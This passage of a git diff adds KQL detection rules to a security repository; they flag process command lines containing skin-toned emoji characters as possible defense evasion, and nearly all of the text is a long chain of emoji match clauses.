contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains "👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or 
ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" 
or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or 
ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or 
ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
new file mode 100644
index 00000000..2fee1173
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or 
ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains "🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or 
ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains "👦🏽" or ProcessCommandLine contains "👩🏽" or ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or 
ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains 
"🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine 
contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or 
ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains "🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains "🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" 
or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains "👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or 
ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains 